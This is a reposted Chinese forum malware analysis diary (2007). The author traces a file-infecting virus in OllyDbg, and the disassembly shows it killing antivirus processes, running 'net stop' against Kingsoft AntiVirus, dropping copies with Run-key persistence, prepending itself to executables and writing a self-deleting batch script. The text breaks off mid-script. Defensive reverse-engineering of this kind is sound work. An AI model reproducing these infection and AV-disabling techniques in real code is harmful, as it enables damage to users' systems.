标题:
[转帖]病毒分析日记(一)
[打印本页]
作者:
yongmin
时间:
2007-1-24 22:55
标题:
[转帖]病毒分析日记(一)
标 题: 病毒分析日记(一) 作 者: 小娃崽 时 间: 2007-01-11,13:21 链 接: http://bbs.pediy.com/showthread.php?threadid=37783 刚重装系统之后,玩了一会泡泡堂,上了一会QQ之后病毒又出现了!刚装完的系统又有病毒,难道系统碟带毒的?今天想用LorDPe查看某个 程序的区段,刚一运行LorDPe机子就突然卡住了,任务管理器出现了N多新进程。。。事有可疑,接着就发现LorDPe程序的图标不见了,难道被 感染了?后来发现D:E:F:下的所有EXE程序的图标几乎都不见了。。。。系统盘就不看了,刚装完的呢! 下面这些是我列出来的,把他们都列到黑名单!同时他们都出现在注册表的启动项目当中。 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ c:\windows\uninst\rundl132.exe C:\Program Files\Microsoft\svhost32.exe C:\Documents and Settings\huyuytyt\Local Settings\Temp\wlzs.exe C:\Documents and Settings\huyuytyt\Local Settings\Temp\mhs2.exe c:\windows\SMSS.EXE c:\windows\LOGO1_.EXE c:\windows\SYSTEM32\iexp1ore.exe c:\windows\SYSTEM32\expiorer.exe HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows load=?粓? ? 这里也好可疑!!!!!!!!! @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 直接到看雪下LorDPe,随便找了几个程序查看区段。。 ============================================================================================ ollydbg,ollyice,loaddll的以及很多的exe 都是这样: 名称 VOFFSET VSIZE ROFFSET RSIZE 标志 cc870 00001000 0002c000 00000200 00000000 E0000060 cc871 00002d00 0000e000 00000200 0000e000 E0000060 cc872 0003b000 00001034 0000e200 00000301 E0000060 入口点统一是:0002F86F ============================================================================================= 怎么分析呢?我还是直接到看雪下一个ollydbg来跑一下,因为我不知道怎么分离可疑的区段以及还原代码。。那目标就是我自己写的seh.exe( 被感染了),因为这个程序的代码还在。。。我知道自己写了什么代码在里面!! 跟了一遍代码,结果什么都跟不到。。。加密了???查看都有什么函数吧!!! 名称位于seh 地址 区段 类型 ( 名称 注释 0042D084 cc871 输入 ( KERNEL32.CloseHandle 0042D07C cc871 输入 ( KERNEL32.CreateFileA 0042D088 cc871 输入 ( KERNEL32.ExitProcess 0042D068 cc871 输入 ( KERNEL32.GetProcAddress 0042D078 cc871 输入 ( KERNEL32.GetTempPathA 0042D064 cc871 输入 ( KERNEL32.LoadLibraryA 0042D070 cc871 输入 ( KERNEL32.VirtualAlloc 0042D074 cc871 输入 ( KERNEL32.VirtualFree 0042D06C cc871 输入 ( KERNEL32.VirtualProtect 0042D080 cc871 输入 ( KERNEL32.WriteFile 0042F86F cc871 输出 <模块入口点> 还好不是很多,我选择选断 bp CreateFileA,发现一个很有趣的现象,OD左下脚提示读取[7*******],N多的7*******快速飞过之后终于停 下来了。。 0012FE24 00404AD7 /CALL 到 CreateFileA 0012FE28 009A14C8 |FileName = "C:\WINDOWS\system32\\drivers\etc\hosts" 0012FE2C C0000000 |Access = GENERIC_READ|GENERIC_WRITE 0012FE30 00000000 |ShareMode = 0 0012FE34 00000000 |pSecurity = NULL 0012FE38 00000003 |Mode = OPEN_EXISTING 0012FE3C 00000080 |Attributes = NORMAL 0012FE40 00000000 \hTemplateFile = NULL 之后一路狂按F8来到这里,之前的好象都是对hosts这个文件的操作。。。。。。 00408C?? 55 push ebp 00408CBD 8BEC mov ebp, esp 00408CBF 81C4 A0FEFFFF add esp, -160 ####略######## 00408D55 E8 2ABDFFFF call 00404A84 //跟进 { 00404A84 53 push ebx ####略######## 00404AD2 E8 85F7FFFF call 0040425C ; jmp 到 kernel32.CreateFileA 00404AD7 5F pop edi 00404AD8 5E pop esi 00404AD9 5B pop ebx 00404ADA C3 retn 堆栈提示: 0012FE04 009A13F0 |FileName = "C:\Documents and Settings\huyuytyt\",D7,"烂鎈",B2,"",A1,"",B6,"綷seh.exe" 0012FE08 80000000 |Access = GENERIC_READ 0012FE0C 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE 0012FE10 00000000 |pSecurity = NULL 0012FE14 00000003 |Mode = OPEN_EXISTING 0012FE18 00000080 |Attributes = NORMAL 0012FE1C 00000000 \hTemplateFile = NULL } //打开自身文件 00408D5A 8BF0 mov esi, eax 00408D5C 83FE FF cmp esi, -1 //判断是不是打开失败了 00408D5F 0F84 94000000 je 00408DF9 00408D65 6A 00 push 0 00408D67 8D45 F0 lea eax, dword ptr [ebp-10] 00408D6A 50 push eax 00408D6B 68 00010000 push 100 00408D70 8D85 DCFEFFFF lea eax, dword ptr [ebp-124] 00408D76 50 push eax 00408D77 56 push esi 00408D78 E8 47B6FFFF call 004043C4 ; jmp 到 kernel32.ReadFile 看堆栈: 0012FE1C 00000060 |hFile = 00000060 (window) 0012FE20 0012FE84 |Buffer = 0012FE84 0012FE24 00000100 |BytesToRead = 100 (256.) 0012FE28 0012FF98 |pBytesRead = 0012FF98 0012FE2C 00000000 \pOverlapped = NULL //读取256字节。。。 00408D7D 85C0 test eax, eax //读取失败? 00408D7F 74 72 je short 00408DF3 00408D81 817D F0 0001000>cmp dword ptr [ebp-10], 100 //不是100h字节? 00408D88 75 69 jnz short 00408DF3 00408D8A 8D85 0CFFFFFF lea eax, dword ptr [ebp-F4] //[ebp-F4] =E501 00408D90 8B00 mov eax, dword ptr [eax] 00408D92 A3 A0294100 mov dword ptr [4129A0], eax 00408D97 68 00000001 push 1000000 //1000000 (16777216.) 00408D9C 6A 00 push 0 //GMEM_FIXED 00408D9E E8 C9B5FFFF call 0040436C ; jmp 到 kernel32.GlobalAlloc //申请1000000大小的固定内存 00408DA3 A3 90294100 mov dword ptr [412990], eax 00408DA8 813D A0294100 0>cmp dword ptr [4129A0], 1000000 //eax(E501)与1000000h比较, 00408DB2 7F 3F jg short 00408DF3 00408DB4 A1 A0294100 mov eax, dword ptr [4129A0] 00408DB9 E8 CE96FFFF call 0040248C 00408DBE A3 94294100 mov dword ptr [412994], eax 00408DC3 33C9 xor ecx, ecx 00408DC5 33D2 xor edx, edx 00408DC7 8BC6 mov eax, esi eax=esi=60h 00408DC9 E8 FABAFFFF call 004048C8 //跟进 { 004048C8 51 push ecx //0 004048C9 6A 00 push 0 //0 004048CB 52 push edx //0 004048CC 50 push eax //hFile=60h 004048CD E8 12FBFFFF call 004043E4 ; jmp 到 kernel32.SetFilePointer 004048D2 C3 retn //将文件指针移动到文件开始处,返回 } 00408DCE 6A 00 push 0 //pOverlapped = NULL 00408DD0 8D45 F0 lea eax, dword ptr [ebp-10] 00408DD3 50 push eax //pBytesRead = 0012FF98 00408DD4 A1 A0294100 mov eax, dword ptr [4129A0] 00408DD9 50 push eax //BytesToRead = E501 (58625.) 00408DDA A1 94294100 mov eax, dword ptr [412994] 00408DDF 50 push eax //Buffer = 009A142C 00408DE0 56 push esi //hFile = 00000060 (window) 00408DE1 E8 DEB5FFFF call 004043C4 ; jmp 到 kernel32.ReadFile //读取E501字节。。。 00408DE6 8B45 F0 mov eax, dword ptr [ebp-10] //E501到eax 00408DE9 3B05 A0294100 cmp eax, dword ptr [4129A0] //比较是不是读取了E501字节 00408DEF 75 02 jnz short 00408DF3 00408DF1 B3 01 mov bl, 1 00408DF3 56 push esi 00408DF4 E8 43B4FFFF call 0040423C ; jmp 到 kernel32.CloseHandle 00408DF9 84DB test bl, bl 00408DFB 0F84 5D030000 je 0040915E 00408E01 E8 866E0000 call 0040FC8C //跟进 { 0040FC8C 53 push ebx 0040FC8D 33DB xor ebx, ebx 0040FC8F 68 F0FC4000 push 0040FCF0 //MappingName = "渝磲痂矧逋逋逋" 0040FC94 6A 00 push 0 //InheritHandle = FALSE 0040FC96 6A 06 push 6 //Access = 6 0040FC98 E8 1747FFFF call 004043B4 ; jmp 到 kernel32.OpenFileMappingA 0040FC9D A3 98294100 mov dword ptr [412998], eax 0040FCA2 833D 98294100 0>cmp dword ptr [412998], 0 0040FCA9 74 04 je short 0040FCAF 0040FCAB B3 01 mov bl, 1 0040FCAD EB 1C jmp short 0040FCCB 0040FCAF 68 F0FC4000 push 0040FCF0 //MapName = "渝磲痂矧逋逋逋" 0040FCB4 68 54400000 push 4054 //MaximumSizeLow = 4054 0040FCB9 6A 00 push 0 //MaximumSizeHigh = 0 0040FCBB 6A 04 push 4 //Protection = PAGE_READWRITE 0040FCBD 6A 00 push 0 //pSecurity = NULL 0040FCBF 6A FF push -1 //hFile = FFFFFFFF 0040FCC1 E8 9E45FFFF call 00404264 ; jmp 到 kernel32.CreateFileMappingA 0040FCC6 A3 98294100 mov dword ptr [412998], eax 0040FCCB 6A 00 push 0 0040FCCD 6A 00 push 0 0040FCCF 6A 00 push 0 0040FCD1 6A 06 push 6 0040FCD3 A1 98294100 mov eax, dword ptr [412998] 0040FCD8 50 push eax 0040FCD9 E8 C646FFFF call 004043A4 ; jmp 到 kernel32.MapViewOfFile 0040FCDE A3 9C294100 mov dword ptr [41299C], eax 0040FCE3 84DB test bl, bl 0040FCE5 75 05 jnz short 0040FCEC 0040FCE7 E8 A8070000 call 00410494 //这个call里面的赋值我还不是很明了 0040FCEC 8BC3 mov eax, ebx 0040FCEE 5B pop ebx 0040FCEF C3 retn } 00408E06 8BD8 mov ebx, eax 00408E08 84DB test bl, bl 00408E0A 74 64 je short 00408E70 //顺着OD跳走 。。。。。。 00408E70 8B07 mov eax, dword ptr [edi] // 00408E72 C740 0C 0100000>mov dword ptr [eax+C], 1 00408E72 C740 0C 0100000>mov dword ptr [eax+C], 1 00408E79 E8 12FDFFFF call 00408B90 //跟进 00408B90 55 push ebp 00408B91 8BEC mov ebp, esp 00408B93 33C9 xor ecx, ecx 00408B95 51 push ecx 00408B96 51 push ecx 00408B97 51 push ecx 00408B98 51 push ecx 00408B99 51 push ecx 00408B9A 33C0 xor eax, eax 00408B9C 55 push ebp 00408B9D 68 448C4000 push 00408C44 00408BA2 64:FF30 push dword ptr fs:[eax] 00408BA5 64:8920 mov dword ptr fs:[eax], esp 00408BA8 E8 8BE6FFFF call 00407238 //跟进 00408BAD 8D55 F8 lea edx, dword ptr [ebp-8] 00407238 55 push ebp 00407239 8BEC mov ebp, esp 0040723B B9 05000000 mov ecx, 5 00407240 6A 00 push 0 00407242 6A 00 push 0 00407244 49 dec ecx 00407245 ^ 75 F9 jnz short 00407240 00407247 33C0 xor eax, eax 00407249 55 push ebp 0040724A 68 5A734000 push 0040735A 0040724F 64:FF30 push dword ptr fs:[eax] 00407252 64:8920 mov dword ptr fs:[eax], esp 00407255 8D55 FC lea edx, dword ptr [ebp-4] 00407258 B8 70734000 mov eax, 00407370 ; ASCII "裔鐾镱" 0040725D E8 5EDAFFFF call 00404CC0 00407262 8B45 FC mov eax, dword ptr [ebp-4] ; RavMon.exe 00407265 E8 9EC2FFFF call 00403508 0040726A 50 push eax 0040726B 8D55 F8 lea edx, dword ptr [ebp-8] 0040726E B8 84734000 mov eax, 00407384 ; ASCII "裔鐾镱渺狍? 00407273 E8 48DAFFFF call 00404CC0 00407278 8B45 F8 mov eax, dword ptr [ebp-8] ; RavMonClass 0040727B E8 88C2FFFF call 00403508 00407280 50 push eax 00407281 E8 26D2FFFF call 004044AC ; jmp 到 user32.FindWindowA //FindWindowA(RavMonClass,RavMon.exe) 00407286 6A 00 push 0 00407288 6A 00 push 0 0040728A 6A 10 push 10 0040728C 50 push eax 0040728D E8 62D2FFFF call 004044F4 ; jmp 到 user32.SendMessageA //发送关闭消息 00407292 8D55 F4 lea edx, dword ptr [ebp-C] 00407295 B8 98734000 mov eax, 00407398 ; ASCII "徘认釉嘏" 0040729A E8 21DAFFFF call 00404CC0 0040729F 8B45 F4 mov eax, dword ptr [ebp-C] ; "EGHOST.EXE" 004072A2 E8 B9020000 call 00407560 004072A7 8D55 F0 lea edx, dword ptr [ebp-10] 004072AA B8 AC734000 mov eax, 004073AC ; ASCII "土商拖萎咆? 004072AF E8 0CDAFFFF call 00404CC0 004072B4 8B45 F0 mov eax, dword ptr [ebp-10] ; "MAILMON.EXE" 004072B7 E8 A4020000 call 00407560 004072BC 8D55 EC lea edx, dword ptr [ebp-14] 004072BF B8 C0734000 mov eax, 004073C0 004072C4 E8 F7D9FFFF call 00404CC0 004072C9 8B45 EC mov eax, dword ptr [ebp-14] ; "KAVPFW.EXE" 004072CC E8 8F020000 call 00407560 004072D1 8D55 E8 lea edx, dword ptr [ebp-18] 004072D4 B8 D4734000 mov eax, 004073D4 ; ASCII "尚烈拖耶咆? 004072D9 E8 E2D9FFFF call 00404CC0 004072DE 8B45 E8 mov eax, dword ptr [ebp-18] ; "IPARMOR.EXE" 004072E1 E8 7A020000 call 00407560 004072E6 8D55 E4 lea edx, dword ptr [ebp-1C] 004072E9 B8 E8734000 mov eax, 004073E8 ; ASCII "裔鲰镱洚咆? 004072EE E8 CDD9FFFF call 00404CC0 004072F3 8B45 E4 mov eax, dword ptr [ebp-1C] ; "Ravmond.EXE" 004072F6 E8 65020000 call 00407560 004072FB 8D55 E0 lea edx, dword ptr [ebp-20] 004072FE B8 FC734000 mov eax, 004073FC ; ASCII "蝈珞鲢" 00407303 E8 B8D9FFFF call 00404CC0 00407308 8B45 E0 mov eax, dword ptr [ebp-20] ; "regsvc.exe" 0040730B E8 50020000 call 00407560 00407310 8D55 DC lea edx, dword ptr [ebp-24] 00407313 B8 70734000 mov eax, 00407370 ; ASCII "裔鐾镱" 00407318 E8 A3D9FFFF call 00404CC0 0040731D 8B45 DC mov eax, dword ptr [ebp-24] ; "RavMon.exe" 00407320 E8 3B020000 call 00407560 00407325 8D55 D8 lea edx, dword ptr [ebp-28] 00407328 B8 10744000 mov eax, 00407410 ; ASCII "磴箬殄熹" 0040732D E8 8ED9FFFF call 00404CC0 00407332 8B45 D8 mov eax, dword ptr [ebp-28] ; "mcshield.exe" 00407335 E8 26020000 call 00407560 0040733A E8 39FEFFFF call 00407178 0040733F 33C0 xor eax, eax 00407341 5A pop edx 00407342 59 pop ecx 00407343 59 pop ecx 00407344 64:8910 mov dword ptr fs:[eax], edx 00407347 68 61734000 push 00407361 0040734C 8D45 D8 lea eax, dword ptr [ebp-28] 0040734F BA 0A000000 mov edx, 0A 00407354 E8 3FBEFFFF call 00403198 00407359 C3 retn //call 00404CC0这个是解密函数,负责将乱码解密 //call 00407560这个函数是关闭指定进程的一段代码,先用ProcessFirst,Processnext,CreateToolhelp32napshot等进程快照函数列举有 没有以下进程: 0012FDD8 009A0FD0 ASCII "mcshield.exe" 0012FDDC 009A1084 ASCII "RavMon.exe" 0012FDE0 009A1170 ASCII "regsvc.exe" 0012FDE4 009A1290 ASCII "Ravmond.EXE" 0012FDE8 009A01CC ASCII "IPARMOR.EXE" 0012FDEC 009A0364 ASCII "KAVPFW.EXE" 0012FDF0 009A053C ASCII "MAILMON.EXE" 0012FDF4 009A09C0 ASCII "EGHOST.EXE" 0012FDF8 009A0950 ASCII "RavMonClass" 0012FDFC 009A08E4 ASCII "RavMon.exe" 有就用 OpenProcess,TerminateProcess函数关闭之。 00408BAD 8D55 F8 lea edx, dword ptr [ebp-8] 00408BB0 B8 588C4000 mov eax, 00408C58 ; ASCII "酥惋钬挟素? 00408BB5 E8 06C1FFFF call 00404CC0 00408BBA 8B45 F8 mov eax, dword ptr [ebp-8] ; "KVMonXP.KXP 00408BBD E8 9EE9FFFF call 00407560 00408BC2 8D55 F4 lea edx, dword ptr [ebp-C] 00408BC5 B8 6C8C4000 mov eax, 00408C6C ; ASCII "艘彗砒" 00408BCA E8 F1C0FFFF call 00404CC0 00408BCF 8B45 F4 mov eax, dword ptr [ebp-C] ; "KRegEx.exe" 00408BD2 E8 89E9FFFF call 00407560 00408BD7 8D55 F0 lea edx, dword ptr [ebp-10] 00408BDA B8 808C4000 mov eax, 00408C80 ; ASCII "酥匦匦" 00408BDF E8 DCC0FFFF call 00404CC0 00408BE4 8B45 F0 mov eax, dword ptr [ebp-10] ; "KVXP.KXP" 00408BE7 E8 74E9FFFF call 00407560 00408BEC 6A 00 push 0 00408BEE 8D55 EC lea edx, dword ptr [ebp-14] 00408BF1 B8 948C4000 mov eax, 00408C94 00408BF6 E8 C5C0FFFF call 00404CC0 00408BFB 8B45 EC mov eax, dword ptr [ebp-14] ; "net stop ""Kingsoft AntiVirus Service"" 00408BFE E8 05A9FFFF call 00403508 00408C03 50 push eax 00408C04 E8 33B8FFFF call 0040443C ; jmp 到 kernel32.WinExec 00408C09 8D45 FC lea eax, dword ptr [ebp-4] 00408C0C 50 push eax 00408C0D 6A 00 push 0 00408C0F 6A 00 push 0 00408C11 68 008B4000 push 00408B00 00408C16 6A 00 push 0 00408C18 6A 00 push 0 00408C1A E8 55B6FFFF call 00404274 ; jmp 到 kernel32.CreateThread //这里同上,并且执行了WinExec("net stop ""Kingsoft AntiVirus Service"",SW_HIDE) //创建了一个线程 0040856B 64:8920 mov dword ptr fs:[eax], esp 0040856E 8D45 F4 lea eax, dword ptr [ebp-C] 00408571 E8 2EF9FFFF call 00407EA4 ; 取系统目录 00408576 8B55 F4 mov edx, dword ptr [ebp-C] 00408579 8D45 FC lea eax, dword ptr [ebp-4] 0040857C B9 6C864000 mov ecx, 0040866C ; ASCII "uninstall\" 00408581 E8 CEADFFFF call 00403354 ; 连接 00408586 8B45 FC mov eax, dword ptr [ebp-4] 00408589 E8 72C5FFFF call 00404B00 0040858E 84C0 test al, al 00408590 75 10 jnz short 004085A2 00408592 6A 00 push 0 00408594 8B45 FC mov eax, dword ptr [ebp-4] 00408597 E8 6CAFFFFF call 00403508 0040859C 50 push eax 0040859D E8 B2BCFFFF call 00404254 ; jmp 到 kernel32.CreateDirectoryA 004085A2 8D55 F0 lea edx, dword ptr [ebp-10] 004085A5 B8 80864000 mov eax, 00408680 004085AA E8 11C7FFFF call 00404CC0 004085AF 8B55 F0 mov edx, dword ptr [ebp-10] ; "rundl132.exe" 004085B2 8D45 FC lea eax, dword ptr [ebp-4] 004085B5 E8 56ADFFFF call 00403310 004085BA 8B45 FC mov eax, dword ptr [ebp-4] ; C:\WINDOWS\uninstall\rundl132.exe 004085BD E8 12C3FFFF call 004048D4 ; 进去就知道是creaefilea 004085C2 8BD8 mov ebx, eax 004085C4 83FB FF cmp ebx, -1 ;创建失败? 004085C7 74 1E je short 004085E7 004085C9 6A 00 push 0 004085CB 8D45 F8 lea eax, dword ptr [ebp-8] 004085CE 50 push eax 004085CF A1 A0294100 mov eax, dword ptr [4129A0] 004085D4 50 push eax 004085D5 A1 94294100 mov eax, dword ptr [412994] 004085DA 50 push eax 004085DB 53 push ebx 004085DC E8 63BEFFFF call 00404444 ; jmp 到 kernel32.WriteFile 004085E1 53 push ebx 004085E2 E8 55BCFFFF call 0040423C ; jmp 到 kernel32.CloseHandle 004085E7 8B45 FC mov eax, dword ptr [ebp-4] ; C:\WINDOWS\uninstall\rundl132.exe 004085EA E8 85C4FFFF call 00404A74 004085EF 84C0 test al, al 004085F1 74 41 je short 00408634 004085F3 8B45 FC mov eax, dword ptr [ebp-4] 004085F6 E8 0DAFFFFF call 00403508 004085FB 50 push eax 004085FC 8D55 EC lea edx, dword ptr [ebp-14] 004085FF B8 98864000 mov eax, 00408698 ; ASCII "祜徜" 00408604 E8 B7C6FFFF call 00404CC0 00408609 8B45 EC mov eax, dword ptr [ebp-14] ; load 0040860C E8 F7AEFFFF call 00403508 00408611 50 push eax 00408612 8D55 E8 lea edx, dword ptr [ebp-18] 00408615 B8 A8864000 mov eax, 004086A8 0040861A E8 A1C6FFFF call 00404CC0 0040861F 8B45 E8 mov eax, dword ptr [ebp-18] ; "Software\Microsoft\Windows\CurrentVersion\Run") 00408622 E8 E1AEFFFF call 00403508 ; 写注册表 =================================================================================================================== 总结一:到这里,我知道了程序读取前面的E501字节内容写入到C:\WINDOWS\uninstall\rundl132.exe文件当中,并添加到注册表的启动项目当 中。 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows load=?粓? ? 这个应该也是对应rundl132.exe的 同时程序结束掉常见的杀毒软件,关闭了Kingsoft AntiVirus Service这个服务。。 创建的线程00408B00,跟到那发现有winmm.waveOutSetVolume等函数 ,(我的MP3突然变成静音了,是不是这几个函数在作怪?呵呵..)以及用FindWindow查找avp.exe,用SendMessage关闭的代码。。。 继续跟着哦od走,来到这里: 00407F2F E8 50CBFFFF call 00404A84 ; 打开自身文件 00407F34 8BF0 mov esi, eax 00407F36 83FE FF cmp esi, -1 00407F39 0F84 E1030000 je 00408320 ; 失败? 00407F3F 6A 00 push 0 00407F41 56 push esi 00407F42 E8 C5C3FFFF call 0040430C ; jmp 到 kernel32.GetFileSize 00407F47 3B05 A0294100 cmp eax, dword ptr [4129A0] ; 文件大小-E501 00407F4D 0F9FC3 setg bl 00407F50 84DB test bl, bl 00407F52 0F84 C2030000 je 0040831A 00407F58 8D95 64FDFFFF lea edx, dword ptr [ebp-29C] 00407F5E B8 64834000 mov eax, 00408364 ; ASCII "" 00407F63 E8 58CDFFFF call 00404CC0 00407F68 8B85 64FDFFFF mov eax, dword ptr [ebp-29C] ; ".EXE" 00407F6E 50 push eax 00407F6F 8D95 60FDFFFF lea edx, dword ptr [ebp-2A0] 00407F75 33C0 xor eax, eax 00407F77 E8 A0A7FFFF call 0040271C 00407F7C 8B95 60FDFFFF mov edx, dword ptr [ebp-2A0] 00407F82 8D45 EC lea eax, dword ptr [ebp-14] 00407F85 59 pop ecx 00407F86 E8 C9B3FFFF call 00403354 00407F8B 8B45 EC mov eax, dword ptr [ebp-14] 00407F8E E8 75B5FFFF call 00403508 00407F93 50 push eax ; "C:\Documents and Settings\huyuytyt\",D7,"烂 鎈",B2,"",A1,"",B6,"綷MdnPacker.exe.exe" 00407F94 E8 E3C2FFFF call 0040427C ; jmp 到 kernel32.DeleteFileA //先删掉。。要不下面的函数容易出错! 00407F99 8B45 EC mov eax, dword ptr [ebp-14] 00407F9C E8 D3CAFFFF call 00404A74 00407FA1 84C0 test al, al 00407FA3 0F85 71030000 jnz 0040831A 00407FA9 8B45 EC mov eax, dword ptr [ebp-14] 00407FAC E8 23C9FFFF call 004048D4 { 。。。。。。 004048D7 6A 00 push 0 004048D9 68 80000000 push 80 004048DE 6A 02 push 2 004048E0 6A 00 push 0 004048E2 6A 00 push 0 004048E4 68 000000C0 push C0000000 004048E9 8BC3 mov eax, ebx 004048EB E8 18ECFFFF call 00403508 004048F0 50 push eax |FileName = "C:\Documents and Settings\huyuytyt\",D7," 烂鎈",B2,"",A1,"",B6,"綷MdnPacker.exe.exe" 004048F1 E8 66F9FFFF call 0040425C ; jmp 到 kernel32.CreateFileA 004048F6 5B pop ebx 004048F7 C3 retn //创建了一个文件,只是比本身的多了一个.exe } 00407FB1 8BF8 mov edi, eax 00407FB3 83FF FF cmp edi, -1 00407FB6 0F84 5E030000 je 0040831A 00407FBC 8D45 CC lea eax, dword ptr [ebp-34] 00407FBF 50 push eax 00407FC0 8D45 D4 lea eax, dword ptr [ebp-2C] 00407FC3 50 push eax 00407FC4 8D45 DC lea eax, dword ptr [ebp-24] 00407FC7 50 push eax 00407FC8 56 push esi 00407FC9 E8 46C3FFFF call 00404314 ; jmp 到 kernel32.GetFileTime 00407FCE 8D45 E4 lea eax, dword ptr [ebp-1C] 00407FD1 BA 74834000 mov edx, 00408374 00407FD6 E8 31B2FFFF call 0040320C 00407FDB 8D85 58FDFFFF lea eax, dword ptr [ebp-2A8] 00407FE1 B9 84834000 mov ecx, 00408384 ; ASCII "边" 00407FE6 8B55 E4 mov edx, dword ptr [ebp-1C] 00407FE9 E8 66B3FFFF call 00403354 00407FEE 8B85 58FDFFFF mov eax, dword ptr [ebp-2A8] 00407FF4 8D95 5CFDFFFF lea edx, dword ptr [ebp-2A4] 00407FFA E8 C1CCFFFF call 00404CC0 00407FFF 8B85 5CFDFFFF mov eax, dword ptr [ebp-2A4] ; "Logo1_.exe" 00408005 50 push eax 00408006 8D85 54FDFFFF lea eax, dword ptr [ebp-2AC] 0040800C E8 93FEFFFF call 00407EA4 ; 取系统目录 00408011 8B95 54FDFFFF mov edx, dword ptr [ebp-2AC] ; 系统目录--EDX 00408017 8D45 F0 lea eax, dword ptr [ebp-10] 0040801A 59 pop ecx 0040801B E8 34B3FFFF call 00403354 ; 连接 00408020 8B45 F0 mov eax, dword ptr [ebp-10] ; "C:\WINDOWS\Logo1_.exe" 00408023 E8 ACC8FFFF call 004048D4 ;这个call是创建文件的一个函数,传进去的EAX指向文件名 00408052 50 push eax 00408053 A1 90294100 mov eax, dword ptr [412990] 00408058 50 push eax ;EAX=E501,读取E501字节 00408059 56 push esi ;hFile=64,可以看出是自身文件 0040805A E8 65C3FFFF call 004043C4 ; jmp 到 kernel32.ReadFile 0040805F 837D F8 00 cmp dword ptr [ebp-8], 0 00408063 74 1D je short 00408082 00408065 8B45 F8 mov eax, dword ptr [ebp-8] 00408068 2945 F4 sub dword ptr [ebp-C], eax 0040806B 8B15 90294100 mov edx, dword ptr [412990] 00408071 8B4D F8 mov ecx, dword ptr [ebp-8] 00408074 8B45 FC mov eax, dword ptr [ebp-4] 00408077 E8 7CC8FFFF call 004048F8 ;跟进知道是写文件了 0040807C 837D F4 00 cmp dword ptr [ebp-C], 0 00408080 ^\77 BD ja short 0040803F 00408082 8B45 FC mov eax, dword ptr [ebp-4] 00408085 50 push eax 00408086 E8 B1C1FFFF call 0040423C ; jmp 到 kernel32.CloseHandle //关闭文件句柄! 0040808B C645 CB 01 mov byte ptr [ebp-35], 1 0040808F EB 04 jmp short 00408095 00408091 C645 CB 00 mov byte ptr [ebp-35], 0 00408095 6A 00 push 0 ;从文件开始处 00408097 6A 00 push 0 00408099 A1 A0294100 mov eax, dword ptr [4129A0] ;E501到EAX 0040809E 50 push eax 将文件指针移动到E501 0040809F 56 push esi 004080A0 E8 3FC3FFFF call 004043E4 ; jmp 到 kernel32.SetFilePointer 004080A5 6A 00 push 0 004080A7 8D45 F8 lea eax, dword ptr [ebp-8] 004080AA 50 push eax 004080AB 68 00000001 push 1000000 ;读 004080B0 A1 90294100 mov eax, dword ptr [412990] ;文 004080B5 50 push eax ;件 004080B6 56 push esi 004080B7 E8 08C3FFFF call 004043C4 ; jmp 到 kernel32.ReadFile 004080BC 837D F8 00 cmp dword ptr [ebp-8], 0 004080C0 74 12 je short 004080D4 004080C2 8B15 90294100 mov edx, dword ptr [412990] 004080C8 8B4D F8 mov ecx, dword ptr [ebp-8] ; [EBP-8]=文件大小-E501吗? 004080CB 8BC7 mov eax, edi 004080CD E8 26C8FFFF call 004048F8 ;跟进就知道是将读到的内容写如文件,通过查看hfile=64h就 知道是写"C:\Documents and Settings\huyuytyt\",D7,"烂鎈",B2,"",A1,"",B6,"綷MdnPacker.exe.exe",比原来的多了.exe 004080D2 ^ EB D1 jmp short 004080A5 004080D4 8D45 CC lea eax, dword ptr [ebp-34] 004080D4 8D45 CC lea eax, dword ptr [ebp-34] 004080D7 50 push eax 004080D8 8D45 D4 lea eax, dword ptr [ebp-2C] 004080DB 50 push eax 004080DC 8D45 DC lea eax, dword ptr [ebp-24] 004080DF 50 push eax 004080E0 57 push edi 004080E1 E8 06C3FFFF call 004043EC ; jmp 到 kernel32.SetFileTime //将文件时间设置回来 004080E6 57 push edi 004080E7 E8 50C1FFFF call 0040423C ; jmp 到 kernel32.CloseHandle //关闭文件句柄 004080EC C685 C6FEFFFF 0>mov byte ptr [ebp-13A], 0 004080F3 8D85 C6FEFFFF lea eax, dword ptr [ebp-13A] 004080F9 50 push eax 004080FA 68 04010000 push 104 004080FF E8 40C2FFFF call 00404344 ; jmp 到 kernel32.GetTempPathA 00408104 C685 C1FDFFFF 0>mov byte ptr [ebp-23F], 0 0040810B 8D85 C1FDFFFF lea eax, dword ptr [ebp-23F] 00408111 50 push eax 00408112 6A 00 push 0 00408114 8D95 50FDFFFF lea edx, dword ptr [ebp-2B0] 0040811A B8 94834000 mov eax, 00408394 0040811F E8 9CCBFFFF call 00404CC0 00408124 8B85 50FDFFFF mov eax, dword ptr [ebp-2B0] 0040812A E8 D9B3FFFF call 00403508 0040812F 50 push eax 00408130 8D85 C6FEFFFF lea eax, dword ptr [ebp-13A] 00408136 50 push eax 00408137 E8 00C2FFFF call 0040433C ; jmp 到 kernel32.GetTempFileNameA 0040813C 8D95 4CFDFFFF lea edx, dword ptr [ebp-2B4] 00408142 B8 A4834000 mov eax, 004083A4 ; ASCII "狒" 00408147 E8 74CBFFFF call 00404CC0 0040814C 8B85 4CFDFFFF mov eax, dword ptr [ebp-2B4] ; 原来是.bat 00408152 50 push eax 00408153 8D85 48FDFFFF lea eax, dword ptr [ebp-2B8] 00408159 8D95 C1FDFFFF lea edx, dword ptr [ebp-23F] 0040815F B9 05010000 mov ecx, 105 00408164 E8 87B1FFFF call 004032F0 00408169 8B85 48FDFFFF mov eax, dword ptr [ebp-2B8] 0040816F 8D4D E8 lea ecx, dword ptr [ebp-18] 00408172 5A pop edx 00408173 E8 B4C7FFFF call 0040492C ; 连接字符 00408178 8B45 E8 mov eax, dword ptr [ebp-18] 0040817B E8 88B3FFFF call 00403508 00408180 50 push eax ; "C:\DOCUME~1\huyuytyt\LOCALS~1\Temp\$$aBE.bat") 00408181 E8 F6C0FFFF call 0040427C ; jmp 到 kernel32.DeleteFileA //先删掉,要不容易出错。 //下面开始写批处理了。。代码已经很长了就不贴了直接看内容 :try1 Del "C:\Documents and Settings\huyuytyt\桌面\病毒\MdnPacker.exe" if exist "C:\Documents and Settings\huyuytyt\桌面\病毒\MdnPacker.exe" goto try1 ren "C:\Documents and Settings\huyuytyt\桌面\病毒\MdnPacker.exe.exe" "MdnPacker.exe" if exist 